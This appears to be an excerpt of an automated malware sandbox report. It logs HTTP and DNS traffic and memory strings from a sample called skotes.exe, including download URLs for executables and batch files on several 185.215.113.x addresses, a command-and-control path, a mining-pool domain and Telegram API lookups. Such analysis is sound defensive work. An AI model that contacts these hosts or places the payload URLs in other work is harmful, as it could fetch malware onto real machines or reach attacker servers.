Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /defend/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /defend/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /defend/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: dHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: sHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache

Source: chrome.exe, 00000013.00000003.2616371451.00004A2C00C6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000013.00000003.2616371451.00004A2C00C6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com/s/notifications/manifest/cr_install.htmlJ, equals www.youtube.com (Youtube)
Source: chrome.exe, 00000013.00000002.2694991608.00004A2C006A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000013.00000002.2694991608.00004A2C006A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000013.00000003.2592512486.00004A2C00E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2592447131.00004A2C00E34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2592569274.00004A2C00930000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000013.00000003.2592512486.00004A2C00E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2592447131.00004A2C00E34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2592569274.00004A2C00930000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000013.00000002.2694991608.00004A2C006A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 00000013.00000002.2694991608.00004A2C006A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000013.00000002.2689553147.00004A2C002C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000013.00000003.2616371451.00004A2C00C6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: t.me
Source: global traffic	DNS traffic detected: DNS query: vikine.rest
Source: global traffic	DNS traffic detected: DNS query: torpdidebar.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: actiothreaz.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: play.google.com
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic	DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic	DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic	DNS traffic detected: DNS query: c.msn.com
Source: global traffic	DNS traffic detected: DNS query: assets.msn.com
Source: global traffic	DNS traffic detected: DNS query: api.msn.com
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic	DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic	DNS traffic detected: DNS query: api.ip.sb
Source: global traffic	DNS traffic detected: DNS query: pool.hashvault.pro

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----9zcba1nym7gv3e3oh47gUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: vikine.restContent-Length: 256Connection: Keep-AliveCache-Control: no-cache

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 07 Feb 2025 16:46:16 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=85ztfSdHUxFlkkG1Y3U%2FGOWOWiurT7XO%2F4CQ9MKmWsStIj3RQqH9FgZqHGRL4VSb2BgQhA3bqizsdirSdVSl%2BFswPueuqnPEILp1YRZDs9wNWuqaMUIWq4GpYomT4167n2c%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90e4daeb9af88cda-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 07 Feb 2025 16:46:22 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xqaip%2Bp0pTfaE8RcQLfPJbJtDeHxn3ZFZhT8QaG1o3DIiNmf3kBKpnEztvrJEWv%2FqIpVelP8Sbq0LpzaIIvBMNiC2mFwDln3ZWEXwqSuIDVf4bj6W9LtnCiQihinm24zUNA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90e4db0bae645e60-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 07 Feb 2025 16:46:30 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hcerCCX%2B0kHcTOpml3W2UEvYLxC91bDPhoU79WyTXMq8XkM%2FJfsOjr%2FZcRHcnqFlAsB1sC%2Bk54U%2F5VaoV%2F9h3zujh32iKTt7e7iWhXEUm5V1QvdtErm7EiE8BoxojGPkc%2BA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90e4db3dfd4543ee-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 07 Feb 2025 16:46:38 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4b%2F5vFsTNJ8tkD61uCGh0W5ApbwnPZynpNYYJXSEtzAP216JNL4Rl393gb%2FhcVFmmLtPPNev9f5HuQTue5ZY5GM8jsUQUzjxDs8sf00oXrRmD8r4JODHQehMoOaQp%2BpOAbA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90e4db6fffbc727b-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 07 Feb 2025 16:46:42 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EL1DOnR51L6zeidHzQdp6ITHWUY0O3s0LpzeHd%2FC6n%2FsmlgEynScjBka0SF%2BODyD%2FExpoVcm%2FgF8AyROr%2B2lZF48ywq%2BYMmgQhtTTXwzLoirh9v2DqYC9ulMA6%2FbvoAcifE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90e4db8bcad043c3-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 07 Feb 2025 16:46:59 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SiDufT%2BT4sCLdEKa2oHpVXSgqh4OnKIIDRlxlE7lZnRIiLLDai4VADb%2FqVezM18MVWVAnktnsK0xsUI2kR87Rvp2APhYZ5HC3aqdkwCN9ORsaDukGPBFrwZ4fFNA8uKf%2FRQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90e4dbf45dfdc443-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 07 Feb 2025 16:47:06 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ksb%2FJybk1d22C7r%2FQ8gOyBGDqKUkQqgcnepn28xqNUZ8I3BFzBX5EQj%2Fcyr%2FcXg3nkFj5ankuudRPEi23siqNqeHo%2BtD3m8SBAWU8VMsIiOfP%2FHhHWYNcLGWysu75kj48v%2FW"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90e4dc2198a8c341-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 07 Feb 2025 16:47:46 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FnYSQX0KJo36MylzL3DLVbKP9FLQ1cU%2FDMe59GIIzGANx%2BqKWNgbfO1RbVPoTsUpEMgFPRdTs%2B17YuXwiee1Wpmq%2F7ie9yZNd%2BrlyTJaxgyXOyYqXhN8hlh6HqmMgWTFEWKe"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90e4dd1d99511a28-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: AkamaiGHostMime-Version: 1.0Content-Type: text/htmlContent-Length: 280Expires: Fri, 07 Feb 2025 16:47:47 GMTDate: Fri, 07 Feb 2025 16:47:47 GMTConnection: closePMUSER_FORMAT_QS: X-CDN-TraceId: 0.65f21602.1738946814.41f945ccAccess-Control-Allow-Headers: Access-Control-Allow-Credentials: falseAccess-Control-Allow-Methods: GET, OPTIONS, POSTAccess-Control-Allow-Origin:
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Feb 2025 16:46:23 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Feb 2025 16:46:44 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Source: skotes.exe, 00000007.00000002.3423300072.0000000001B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/test/am_no.bat
Source: skotes.exe, 00000007.00000002.3423300072.0000000001B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/test/am_no.batl
Source: skotes.exe, 00000007.00000002.3423300072.0000000001B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/testdef/random.exe
Source: skotes.exe, 00000007.00000002.3423300072.0000000001B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/
Source: skotes.exe, 00000007.00000002.3423300072.0000000001B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/6122658-3693405117-2476756634-1003
Source: skotes.exe, 00000007.00000002.3423300072.0000000001B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Data
Source: skotes.exe, 00000007.00000002.3423300072.0000000001B36000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000007.00000002.3423300072.0000000001B0E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000007.00000002.3423300072.0000000001B82000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php054001
Source: skotes.exe, 00000007.00000002.3423300072.0000000001B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php2
Source: skotes.exe, 00000007.00000002.3423300072.0000000001B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpU
Source: skotes.exe, 00000007.00000002.3423300072.0000000001B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php~
Source: skotes.exe, 00000007.00000002.3423300072.0000000001B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/1097348970/G8lVmiI.exe
Source: skotes.exe, 00000007.00000002.3423300072.0000000001B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/1097348970/G8lVmiI.exes
Source: skotes.exe, 00000007.00000002.3423300072.0000000001B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/1097348970/G8lVmiI.exez
Source: skotes.exe, 00000007.00000002.3423300072.0000000001B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/1415984330/MvowLGc.exe$
Source: skotes.exe, 00000007.00000002.3423300072.0000000001B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/1415984330/MvowLGc.exeL
Source: skotes.exe, 00000007.00000002.3423300072.0000000001B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/5643377291/7fOMOTQ.exe
Source: skotes.exe, 00000007.00000002.3423300072.0000000001B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/5801179114/5FheP4L.exe
Source: skotes.exe, 00000007.00000002.3423300072.0000000001ADF000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000007.00000002.3423300072.0000000001B0E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/6691015685/1VB7gm8.exe
Source: skotes.exe, 00000007.00000002.3423300072.0000000001ADF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/6691015685/1VB7gm8.exehqos.dll
Source: skotes.exe, 00000007.00000002.3423300072.0000000001B0E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/6691015685/1VB7gm8.exekj
Source: skotes.exe, 00000007.00000002.3423300072.0000000001B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/7788061076/L65uNi1.exe
Source: skotes.exe, 00000007.00000002.3423300072.0000000001B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/7788061076/af53YGc.exe
Source: skotes.exe, 00000007.00000002.3423300072.0000000001B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/SQL_gulong1/random.exe
Source: skotes.exe, 00000007.00000002.3423300072.0000000001B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/SQL_gulong1/random.exeh
Source: skotes.exe, 00000007.00000002.3423300072.0000000001B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/osint1618/random.exe
Source: skotes.exe, 00000007.00000002.3423300072.0000000001B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/osint1618/random.exe1
